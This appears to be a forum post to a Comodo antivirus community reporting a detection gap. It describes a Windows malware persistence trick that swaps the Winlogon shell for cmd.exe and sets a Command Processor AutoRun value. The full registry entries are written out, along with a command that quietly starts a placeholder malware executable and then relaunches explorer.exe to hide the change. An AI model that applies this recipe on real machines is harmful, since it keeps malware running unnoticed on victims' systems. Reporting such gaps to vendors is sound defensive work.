Alternative way to make malware run at windows start not detected as suspicious

Most malwares to start with Windows are added as services, in App autostart lists or in windows scheduler.

Comodo reports some suspicious autorun entries but totally ignores another way to configure malware to be autostarted.

E.g you can add the malware as AutoRun entry of cmd rather than system autorun, configuring command processor, so it’s executed every time cmd.exe is launched.

A common used strategy usually consists of these steps:


As first action replace the default system shell explorer.exe with command prompt adding a windows register key in

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

with Shell entry set to cmd.exe

so windows at the start launches command prompt executable rather than explorer.exe


Add a register entry to configure command processor in a similar way

[HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
"AutoRun"="[at]mode 20,5 & tasklist /FI \"IMAGENAME eq MalwareExecutable.exe\" 2>NUL | find /I /N \"MalwareExecutable.exe\">NUL && exit & if exist \"C:\\Users\\someusername\\AppData\\Roaming\\Microsoft\\MalwareExecutable.exe\" ( start /MIN \"\" \"C:\\Users\\someusername\\AppData\\Roaming\\Microsoft\\MalwareExecutable.exe\" & tasklist /FI \"IMAGENAME eq explorer.exe\" 2>NUL | find /I /N \"explorer.exe\">NUL && exit & explorer.exe & exit ) else ( tasklist /FI \"IMAGENAME eq explorer.exe\" 2>NUL | find /I /N \"explorer.exe\">NUL && exit & explorer.exe & exit )"

So every time the cmd runs it executes the malware and starts explorer.exe.

The user doesn’t see explorer.exe is no longer the default system shell, because the command launches also explorer.exe in addition with cmd.exe with edited command processor that runs the malware executable.

Regardless the fact malware executable is detected. This kind of behavior at least should be reported as suspicious at the end of an antivirus scan.

If I am not mistaken, although this may launch malware.exe, CIS is still going to block it as the .exe will be either flagged as an unknown or malicious.

Please try it yourself and see what happens.